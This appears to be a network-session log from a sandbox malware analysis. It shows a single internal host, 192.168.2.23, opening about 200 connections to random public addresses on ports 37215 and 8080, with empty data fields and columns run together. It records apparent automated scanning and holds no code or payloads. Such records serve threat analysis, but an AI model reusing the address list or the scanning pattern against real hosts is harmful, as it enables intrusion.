                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29587192.168.2.2344642157.164.82.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29588192.168.2.234232241.121.165.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29589192.168.2.2355736157.227.188.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29590192.168.2.2350264197.166.26.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29591192.168.2.23517649.149.84.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29592192.168.2.2359704197.43.172.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29593192.168.2.235980698.143.204.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29594192.168.2.235073841.198.27.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29595192.168.2.233970854.108.153.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29596192.168.2.234249041.147.167.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29597192.168.2.2346596157.216.244.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29598192.168.2.2351086194.71.186.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29599192.168.2.233393641.195.182.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29600192.168.2.2359994157.221.52.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29601192.168.2.2338544107.126.255.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29602192.168.2.2340482157.26.156.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29603192.168.2.234420641.83.55.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29604192.168.2.236060641.201.79.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29605192.168.2.2341528197.133.138.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29606192.168.2.2347202157.104.127.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29607192.168.2.235074041.6.29.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29608192.168.2.234259441.143.100.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29609192.168.2.2333370157.107.127.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29610192.168.2.233975068.200.117.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29611192.168.2.234647841.239.136.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29612192.168.2.234620684.195.126.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29613192.168.2.2341520157.59.100.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29614192.168.2.2350150197.188.15.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29615192.168.2.2338626197.202.115.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29616192.168.2.2340254197.103.212.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29617192.168.2.2345096197.247.61.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29618192.168.2.23362301.167.212.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29619192.168.2.2336454197.149.127.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29620192.168.2.2341372155.235.169.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29621192.168.2.234862442.125.223.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29622192.168.2.2337886157.136.138.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29623192.168.2.2335172157.198.125.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29624192.168.2.2348524197.101.63.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29625192.168.2.2346576157.43.51.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29626192.168.2.2359026189.198.128.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29627192.168.2.234469277.181.243.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29628192.168.2.2347442197.146.70.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29629192.168.2.2345346157.168.18.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29630192.168.2.234534841.189.31.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29631192.168.2.2342396157.32.65.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29632192.168.2.2340762197.211.30.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29633192.168.2.2336954157.208.231.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29634192.168.2.2336882151.84.145.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29635192.168.2.2359132223.31.90.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29636192.168.2.2341856197.29.142.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29637192.168.2.2342752197.129.95.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29638192.168.2.2343814157.39.33.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29639192.168.2.2348652157.110.209.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29640192.168.2.2338082188.67.253.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29641192.168.2.23605968.35.113.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29642192.168.2.2333358111.55.238.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29643192.168.2.2341524157.232.137.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29644192.168.2.2358644197.225.119.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29645192.168.2.234205441.50.35.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29646192.168.2.2349880157.55.10.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29647192.168.2.2353296157.136.113.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29648192.168.2.2334336150.42.247.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29649192.168.2.2347816197.58.175.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29650192.168.2.2358206162.54.139.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29651192.168.2.2345796173.58.69.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29652192.168.2.2359936197.213.66.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29653192.168.2.2350426182.83.140.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29654192.168.2.2358712157.61.148.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29655192.168.2.233872041.248.214.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29656192.168.2.2343792157.78.192.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29657192.168.2.2347318197.65.45.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29658192.168.2.2336288157.229.113.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29659192.168.2.2354472197.15.8.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29660192.168.2.235051041.173.133.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29661192.168.2.2343132157.178.41.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29662192.168.2.2344038157.18.243.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29663192.168.2.2360876197.213.7.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29664192.168.2.2335804222.64.253.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29665192.168.2.2342332197.174.70.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29666192.168.2.235357841.255.189.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29667192.168.2.2353150161.40.160.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29668192.168.2.2339302197.231.9.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29669192.168.2.2356164157.209.93.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29670192.168.2.2347410109.10.117.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29671192.168.2.2358786114.99.52.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29672192.168.2.2334138157.152.8.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29673192.168.2.2336690197.53.188.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29674192.168.2.2354182157.52.161.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29675192.168.2.2335004157.188.91.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29676192.168.2.2359680157.193.179.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29677192.168.2.2354190157.68.89.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29678192.168.2.2351526157.148.58.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29679192.168.2.233409641.166.89.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29680192.168.2.2351952157.99.88.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29681192.168.2.2359756157.93.60.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29682192.168.2.234604461.13.34.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29683192.168.2.2340794197.124.19.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29684192.168.2.2349366157.82.202.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29685192.168.2.2360036198.44.126.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29686192.168.2.2358870212.114.65.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29687192.168.2.2338394157.146.62.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29688192.168.2.2338944197.36.114.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29689192.168.2.2356750157.113.22.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29690192.168.2.2351754197.118.184.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29691192.168.2.2360236212.205.74.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29692192.168.2.2360058157.82.210.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29693192.168.2.2334732201.254.34.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29694192.168.2.233942842.16.217.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29695192.168.2.2337700197.221.117.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29696192.168.2.2349652191.11.81.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29697192.168.2.233543452.106.230.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29698192.168.2.2338318197.18.57.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29699192.168.2.234677641.11.108.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29700192.168.2.2346930217.146.4.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29701192.168.2.2359744157.44.184.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29702192.168.2.234396041.146.10.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29703192.168.2.2340374197.195.145.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29704192.168.2.2354288157.196.141.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29705192.168.2.234841641.118.229.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29706192.168.2.2336922157.187.136.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29707192.168.2.234353241.188.254.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29708192.168.2.2359622197.139.150.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29709192.168.2.2351490197.237.143.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29710192.168.2.2355164157.249.94.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29711192.168.2.2339746136.236.18.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29712192.168.2.236036441.129.2.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29713192.168.2.2346714157.65.42.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29714192.168.2.2341268157.36.37.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29715192.168.2.235587241.104.55.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29716192.168.2.2344846221.70.151.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29717192.168.2.2354818197.191.74.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29718192.168.2.2342996157.126.162.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29719192.168.2.23375221.111.34.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29720192.168.2.2356092197.157.185.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29721192.168.2.235834241.147.41.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29722192.168.2.234094241.218.181.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29723192.168.2.233549641.223.133.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29724192.168.2.2334106197.33.110.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29725192.168.2.234291841.42.138.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29726192.168.2.2352852157.190.66.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29727192.168.2.234582641.43.120.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29728192.168.2.2345648160.67.224.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29729192.168.2.2354558157.154.52.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29730192.168.2.2348664181.22.67.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29731192.168.2.234829241.187.91.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29732192.168.2.2337202124.252.198.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29733192.168.2.2349056157.240.144.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29734192.168.2.2342346141.161.238.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29735192.168.2.2350376197.57.13.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29736192.168.2.233943641.237.90.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29737192.168.2.2354170197.175.157.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29738192.168.2.235161041.239.42.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29739192.168.2.233525896.79.58.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29740192.168.2.2339646157.245.148.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29741192.168.2.235151441.217.30.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29742192.168.2.235889041.203.207.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29743192.168.2.2354454186.155.45.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29744192.168.2.235392442.191.48.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29745192.168.2.2345508217.145.115.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29746192.168.2.2360470209.34.118.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29747192.168.2.233378277.156.197.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29748192.168.2.233820827.203.97.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29749192.168.2.2334158208.145.114.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29750192.168.2.235636838.173.185.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29751192.168.2.2345438164.146.193.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29752192.168.2.234721041.99.7.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29753192.168.2.2360672101.2.23.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29754192.168.2.235567243.118.157.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29755192.168.2.234822887.222.161.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29756192.168.2.235440050.236.105.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29757192.168.2.2340264140.95.66.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29758192.168.2.2352794106.198.35.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29759192.168.2.23595384.67.226.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29760192.168.2.234495881.134.170.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29761192.168.2.2359012210.49.89.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29762192.168.2.23436649.238.34.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29763192.168.2.2334644132.90.4.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29764192.168.2.2344012141.129.175.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29765192.168.2.2348084202.222.177.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29766192.168.2.235130269.118.251.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29767192.168.2.2356160189.141.105.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29768192.168.2.2345820139.130.83.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29769192.168.2.2336362122.202.255.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29770192.168.2.2358028156.194.247.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29771192.168.2.2345404165.110.186.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29772192.168.2.235045263.48.201.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29773192.168.2.2348526160.98.22.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29774192.168.2.2359184103.81.214.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29775192.168.2.2354790209.155.16.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29776192.168.2.233930013.111.49.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29777192.168.2.235138632.107.154.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29778192.168.2.234349467.245.168.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29779192.168.2.23522342.63.135.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29780192.168.2.233676636.42.154.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29781192.168.2.234433270.94.132.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29782192.168.2.2351646176.197.66.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29783192.168.2.2341656116.224.77.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29784192.168.2.233583299.208.216.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29785192.168.2.2352992142.15.221.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29786192.168.2.234579067.165.9.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29787192.168.2.235654440.117.117.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29788192.168.2.2346914182.207.49.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29789192.168.2.235144092.99.198.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29790192.168.2.2347002217.84.171.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29791192.168.2.2340834138.89.95.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29792192.168.2.2347288132.115.161.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29793192.168.2.2337584119.54.148.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29794192.168.2.233539012.104.49.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29795192.168.2.235999443.231.191.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29796192.168.2.2345336175.229.30.328080
